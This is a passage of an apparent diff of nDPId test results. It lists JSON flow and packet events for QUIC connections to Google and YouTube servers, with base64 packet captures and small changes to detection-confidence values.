+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02318{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1621432876694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432876694,"pkt":"AAAAAAAAAAcAraZQCABFAAViGmJAAEARTcLAqP4L++wSxuaoAbsFTqV5w\/8AAB0IbOm6o+b7s18AAEU0LLQC1yXAWiYnG0IzhK2VYtXys8mZ62JD8wkhsWvqnkzFbhvt3QJvfuPuR1sirwI+KShnUrbM1afN6aEucT9hrS0klXGQkP\/sjbWxbRSVpPd+f9X5MHJS9Hz6kemhKetvXTyJqGbN1G75GC+zwvky4Qoa+1\/EIdMd\/MIuXCU84yBXwj+twRLahCznv3yroalrF474u7NubFW0jMWcRH5J+A15Xme108pRGv37O29qvyKdzOm1\/NNznL9yP2RLUgbmtwygArdZz610E2wne9tt8WxltfSjaavCs3J3wGNB7kwvqcFpV4kuTtBj8cRhDJ8UsAFET3J5wrdiOHvAkcai8b4dgSQNPHDp3xVf8Xxr5a3lZo4oeM2pSFKI4zOy\/gL3IOWrKEH5BRE0tivVe3HggMJPpzZub39IlYLUFGhw1FqGAvGU\/L7xouN\/GGzHYbjg9KBXpegMLxXi3ppGr4R3ZbEegXJV66wPYugPfdTLxj3R2ZAxcu5MSpStr5MG9ltk8lzwLtmx5YcbJbKyEMRaCF1iW\/dcIpEdw9mhALjKcmSqJOsabUpsYKoKUTDLiRb0OEMir5UbZUiQVy4\/7Sfjg8ICBXUxYfj0TnKlaJ+wlyizyGCVB0WjDtYmQo50PxvLRALC1oTClrCfpu+K5RTPrOVf3+YHiGNjoiEYVT3Ysn6ef85QtfRP8nysquU2HQ88cdBu1x51\/5RyV\/+DRSGX7VUOAssxQ1MRma0bjRn3Dmy0rmBgLMBljm\/VFeCUpmDEQk1q52vMrgRR1lJE4AiR7egIJ\/6ghIxt2OWtcRN3jJsaTUSy\/zR3IMutW13i9Gw+AVIamx
3Vj3f2LmCwuEcU4XeICojezZ7vi0NbDJmYGkjSwtTh7b4ESpxisA62XYIfsFsU6JrkPXTQT01HZP1jD5W\/7lmQ0Uzgb\/2mciiqV+PLt4y8IbSi9MMFIn7Fr1j3biSlXPu\/RKPCVeZazwP4GHO\/RBVQpMem9Q8N3P8d2DHSrWjG21BATI\/t4zX6uTupPdTce\/pRl3wh6arawXv4rYaa734DQGVOXKuJAL3VUiEX4k2WKQ6rMy\/2mgtg8f52j\/tm9h2LXlahvO4wQoJ2w0aBRN8mS\/cj\/Ra3JQN+4\/oZNfyurOlap8hdr9uhFzS6jiSKCSEudsefNrvctv9D2s60pV3\/7RkKVVy2YmGu\/fMPAer+QSxevYYR\/AKkpcNjdJbkDD7YmHSguK9rnJzqbP\/etQrDxN0GrlpCWIXAdhL7Wfi2tYHcbnj8KVMmATRN+0400Z6WxauakXJuNv0JQTaVaubj\/PKuuq5K2vb0tCYbHDPd+MadAPo+JJ8pU1ZDa4KyOjlkd5AJbK5Q0frPvukJDpBDNImKfhDpKSebp8mS0bQbYQY0FjVILDcWSeoYGnRDjH4XJcz4fxZCkv0YvY6T1xDnsZGbGC4zJU59YxE5WYODQH3mhJYDZb\/R1Z23tx++rEKCl2Q7KLWqJ5ApuDmaONgp5W6ybOYwz0urwNxYZ8lWWON9dZHSxM5jOoeTSovDCyex8ryrdpEr1yHyEEgBjx97a\/VbuMDI9wE+07AAsKn1v0pSUT2Y4vUwGIFdflJgbjasGl8KWyMuibJCGP7tF5SXVICBAc\/QHntpbpYtsuJHF0\/RWuZ5yeLaxKHv5t92AvGJsO1Kn9KikspdEaOGD07Y\/IrmImcu4IELab4LYJw6sE0eqBRwufR9cgXtZLQQbDqd2TajaJSlfs8qSumGCJZU9e7j4K131s1OqQIPtVUm"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
-00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1621432905483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432905483,"pkt":"AAAAAAAAAAUAtOBOCABFAAViNntAAEARSxrAqP4LXWSX3ZW7AbsFTtZExP8AAB0IShhVJvVFj04AAEU0bXBdseJ245uG4fwHC8m+6tqS\/v6gWT6TRuENAP9tPhydGDsgF7KG9PiuBNd6U4OZoDZDYxdNvgEXRnGpqok1G3cCYyBnmB+42zbaUcW6U0WH8uxsOi5\/mEnkpv0Euyn4vltnRK3e5h6tt2GHGaZNsy6oaivFwmgBfGYXqlFzvmiPzvJp0LRexpgDjU1i\/7Vx3NLfmf7PCWakVkQTn3Mv0hIdyp8NbWby75nFm5vd9qbf7rSRebZCqrG\/gNT3SMKZ9PYXe6zl6Or9B3VtV0CUQVHLUT2ZljaOp+wo2wp+zymYt6qEwhJmfIj1MPdkgXuV3gJi0KHCUAcVSQRFxSkySlYbKd6ChL8GI5FOjZ8QvdYKnwQM7\/z8AgfduUObnEfl6hZZ2npNR6FcP0WFzqQBRqRGO9wwKzFt\/XTgmkAPd3\/wF\/a5iP3PPQDPTiggyH1xpv0ciMP9WN7wbydFhtrLUcfgELiYllzto5jkyT0K6\/M5XWw3Kv1G4BMmIruFxnBZKQUoqA9d1oSjSc9wdZfqCt34KDErlg5RxTvxzlCxbSR1YL1ln0Lc5ooN49Vt0Q6U67rR+tWR3ESuIWUzLCixA\/08yk6CIflG592BY6gPW8Cbm\/dEQnktmUnnaHerrmQJ+oSjAV3xiVvlBT9XkcfS4WGAQSxeXxfXway\/cpuKTExCubwigm9g36DqjHLDwHWdQ6CDBwzPwE7JMioE0h5qzz7kgFtRTn3Dx0fN21mdCirtg9qB4hRCIkLgp9PkotTkEDbsPz4aPrVoVedFUeJh0cg3JwF0sNVAEJ\/svLXWTrK8yCxq3qPCAIv+qhZfntTMCSTOlv+m4\/SG6pP4\/xXexllpq4vN11z\/230fqh41BREXT6ToSYKiLPgIta9MKijhMUrhqLp\/H+6H5q5lyTMHqWsEsQNb9gmgb5bTrnpRQ66GI3I\/Eu6QRe6JQXxj0tdcpH1LILG1JY5awETdC9Gy\/ssWffqANToHPZNHsKgLSZ1Nr4vYsqiHrBBykgGu6do9vSxz86\/Q7Nfe09TEYnNYd\/kOxWDgAjPgINa9ldEyBy\/c1LwwfuQYBqjVd6qzuIvK08UzshDfAry1FSjTNf4Xhzv+C+kRHXoa7jBGnB6icP7W4jD\/KUJLbHASUFpcjtDotzShDZHUYL2umLhCdB5TlPKE75C7x9wNG7TVI9tJsWFBgyfIZUHuK2V6Iv1Xy+i0DPqZ33eKf2\/0cktp3L9oQQztf0yom9iQlAFOrjb0BYxuxSQsDAuCBTfuHuiEnBMg+uie7JClpFd8oxRzgLF2UmGs+bcAjRKlbO8KUqBVWyus6KeC+GY7NYnQOkEB79W\/LSs6F\/y3yumt9XaOjhKZsA1BY2GPva6DJ9bGm5lZVeWW5MqGFMwmbmEdGj7B2lfP6DGaxySHgfivVSWM5AP9dRouhItZWUMTYuA42yBFxC7yYUU5K2dZxoCQBp
BD8hiq\/kMUMEM3CXwPlOYnLiDJ4+OLlI1CXf6o16idWwlO57uhDJqlkgqP5iNglZKDiDaLUKSczncTiHuKNaqGxKe+jsT2MHO9nT+g41OMRLOnPZdlHoF\/GerD0RU3bVnuaPA\/7hWpOovJjEYu0nZDxzelWy4hmTrQXIfWloeao6NvLIo0\/Yq0zpGecbJvwB4o4kud6kzKSyDmvDz4lmDhp7J+b+a+a4OXVg9LI3gcKi3B+a6ggFfUWsH3jytuH49v9jql4XnS3YfR4DGtKs1U+A54fAEg+9sHrLj7+fD3uJet9knr5KO1"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"},"quic": {"client_requested_server_name":"litepages.googlezip.net","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"},"quic": 
{"client_requested_server_name":"litepages.googlezip.net","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1621432905490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432905490,"pkt":"AAAAAAAAAAUAlUIhCABFAAViNn5AAEAROxbAqP4LqsRafrJUAbsFTm9IwP8AAB0IsTWhMbhJUaMAAEU0Gz3E4x\/7PJCbI+CzxViIeUiiyxN5gIybKCWDCC8MybuqrNIvL9Pc+KUdkIcv1Parf76zB\/TXo6yFx03Ggg9vnqr6bkGGsAil7g9byvv9gAZjNQMGSu2b\/WIj+O2UGwYR9Ze56oGlPtQ3fK8ScJ+YBFKT+cpojJQmaymD6Gl7O0M2IsyhuN\/z5MNvVeoQtlTGtwJwJF4t3CB3+LaplqunC8tjUfp86B9GZjRjxLI+vZiWX5JnbOLJMNt1qMf64QnBwt3u85Pa9y3sMgX4lS49\/gtIXTs4bG2nNuP5iZc9DQwpayCdOqbJxVUpt1Fl9lqfqkGDabD\/h21kbArS1JNUPCYt82JW2kdPr89gKelvwKxs4MSTRQcLucGHeSqa+vxitAXlW11buSsT2YEY4TaaN7WLCC6Y5OgIewLiKrBgAIDD1JgOLmJe0jh8CtrwC4u83uCHm2ZVbMl2zcjPFlgSm1Ay5QghKEobHUp9BoKLbGW0OMfnx\/vMYa29tA+ukDFJJVEkBFUnmO5PVGVBLdD\/qq5Vm3qeCHn7bH0JKdEAvXgh7drH4CTmvjpTCgzXInM88QbOwK\/8hBF9B0y\/tT2huASOzdsreHMYES8k
0ynoTtTU\/Go7e+As+IjpMhtw+r\/xyPdBQWw34uc2UrITsPWB94yJD0ktCz9KUH5fj5j\/MTcB3+EW1+ja2Sj2nYyRiHaQ+PsYbGaz6wXCZf\/tEQta61UXPhInHqIOpnQp\/diA\/YXmtWKl13Ka\/nxH0\/283amVXk8g\/p5xQZLdYYbM1SRNChx+BZ5020iyk2PcohpEjNvyiSDmDjrsIgS+Zr+qK1KW+WNd8m7ZfukNh06oyt6uTkWtGfWfvcwkR3CbVTV9K1zZ3JVpadtBKHoVfeSxzUNB8QO3HY1xoBwUiGOqQMyedNultJ9KH4IhP5o5Kj0DYGUHyTaflltEhcSWiITyfwyOZfUVxdCe3WBfMRyjKG3hw9Ag1m0IdO+3+4Sai4t9HAV2dkZrH0YBb8TzQtijMzuOc\/UkBsPoIHkBGzeAvR\/LY9Vvx0FYUh5X9ZD3MIwp92rfZV5hsqNc3rsZmWPZbpmeAfYzTL3829e2Wo5suo7aDIt+YYCq602XYEuGWM+tC+iqjQVOxADDkiMVvc8A2HYsO3wOW+49aVFLGStxeuhQV5lyMKSoVc3s2H3N+yL2RhtSvdV+b0mpGnnhW\/vc7mC9x1sZNQDq1FvyWi6OgOdM6ikZBFhVxT+99VaccO1YRMkituNtiRsVhm75XQZqQj3SqqL7zi4YYwKWE27YtUcI5DX96iUTbNaIXKbJoRkVWEHi7xVpW0qoKbMqyaTsMaxe9oY9tVhw325iZUqJTscJGuYlireqNEe49UiKHrFD3pBUHCyEpSwijnx0RbAj6rwweNbjXSMbaikwVIiNvMIL5VCmZOW\/ZtxLPMa2yys2nECf\/Vuy3Ou\/9DnpSXaPhTvBFgWf28msqEADWXnHOxczzQxoYSRHSEzLrR2jTHxifPCTR9hSWy+JWnFXHJLcH7QJbBCrIdXrcgRQBgdnrkM4BVlslDUk6ZPisArQe+Rj5RV5jX3HYw7JzZSegmwQhkALBsMs6Mymiz0gK4lwsh2Az\/uP7GO8UcOQkp9ZEs6GaH9yS+2hlRtG0Haykp8Fzi0\/SkuRseswdA0H14gPSc\/5WFCyoI7Y18l0y18eYy1sFdl5G9h5zsIxr1Gxqhupt8DBAd46yPzEuBUgOukFiKNOskklsdcO5v54a8qPY1mJBX8XQWL5"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev 
Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1621432907578,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432907578,"pkt":"AAAAAAAAAAUAUmvlCABFAAViOItAAEARD\/\/AqP4LYvvLUamjAbsFTviww\/8AAB0IdEz2yPqFNEUAAEU01lkubHvVAeXsQ5sXGwZERrAsLetkvRSa9r94YrnlT\/RFyWgWZjc\/+m3X4BabWgtMfG2MrRlDeu83ayw7f1Rv29gQ1Fwf3qL9\/y5QL3cILj9wzX79jhfIBW7rk2S021YCCn4cPYvBdSyZo8hiLdDRqY342daZqWhur\/YwUIhfZdJAQA0xgKFAGLgZkHQQNo8iY7pDwNfTWCrPxPcVH\/XyhdL7AM63JNrgEEzMf\/9jsRjfxGAePPUm1\/8wwIq77\/+PVwZ2j3YBRiYZ0seAv7CvRMkkYVrxpAOSkaAOCWqoN0s5yzHmFyDcbv+feS4uFL5UXCfavdd82ZgTmlsjFiR+hG9t7chDZL56DXhZ5TLxZf3UYmIHnX6JZkUrLIVJZ6\/OVCfo3DHRQ4PJOh\/CzeVr8LoegDT5B8ULST3gZnAqDfI276pUF8whh8aVckRyaBeY2ZCBjMcnwLeLg7OKLQvK5wC5BJkNIi5J8oyjbOTedU60kHu3fE+53ZlWBZRS7HAIJQGXa4GEDkaQ5k4XnO\/xxxjpThDLvE8dUHcTQ9ovWlb8\/JSF0up6I6NgBtYGIn5XhNqx0EdEUtgLAzzPtcFSMuYYjicAs9S+W8GgyoFH7nZiOgJcvL3AdZ\/GXk38PSB357IxdJooYxNvjvQ+gKfGJQ5jvUMuu0oyiEO2+gYr9SeGcmLMhDdauhnvk0udsh4awocJv+zrEMXX8l2xSzHndbPtEGFu0slTz0a9mozr6y79gh8In5Bn2s23hBM4ZGcGhqvwp1y4\/CIp1v8EZ3CF\/c\/nf\/AnBeGNBGm\/vfaxi2\/dM2Rilztfd9EUjx6Uz0Q4WrIB5aEwh0AOzRhbK3NHQKo0V2nfc5lpb0UDc9+BrNHOqAdA4BUxqc32WdBMwB8nu8So3Ug4rrM\/JVLFz6\/kRNXUJZRpvlvWmmPwbhgJJtJv\/M89mXfU1kK+Y5ZzDEOWJFwuGE5EwyEXLqfAhuVfYr\/IGf\/dVORQAeJN2Jps3sJhqhEj1IkKjkFBWkkAkONz+gchb05T6MlwCM8C28gRq7Mb7CFBEn\/vYYqlEKnhwzKBeeBye41Vq0gbKM0JV9qRHQ7XKOsVwyIutepBP8jrECNHdwLaIEu+1zVrAN6yVIQ8\/oQq+VsbKPG9+CxCgvT5uKndWjk\/3klEO2lVttmkusFyP5l9gzCYwVOHLBsZ3xnkE2+m\/prV\/JheISUApwdWrKMEd\/078e9MXRkuX+dpNqT7a5dhlSXsO74abB1mrlTL2UcA2ek91eefqFvbEgNjkLzRgECot8CV3+VilYqrujsR+JjJ9wVO2ZRWW2y3ztaE6g21zSYVB6vxMaqYRnz72pD5b35k\/u8uTGE1pcJQr7C2oDFyU6xrQ8fc2olGaloqsNSa9zjm3tw\/aIkxpxphv2ISYW1zYIojgj\/1VCqJN2qkuGsMNJgJdPcqF3OzluCuyf9t
Y53umRYC\/2FFOugDxVHFd6F4iSNEQ3C3zvrpOLrWtwhbX3hkwUWpwIKllXL2Nq\/iK0AdLu5a1u7VIasXJSlmcKgX7VPPNflgTztWI0n6bh20EyUV6JmwylfymR7pRszlj27nJphDjd5FGRwMS2WMwNFJTxb+RT\/9S6rDmaFhFtes\/+ACWdpqhAKM5grfBOdhgmSQbu4voAVj9LPSU108aYASzXKDjwCDNx50fbMcWjuukzLgNuVnkky2tdFq8pWWnhoc+x1nhhOmxTLo9PFGk31LiQUA895pzmo+l2fTL008oeWJdzMT6HnN4Sq93hT2"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"optimizationguide-pa.googleapis.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; 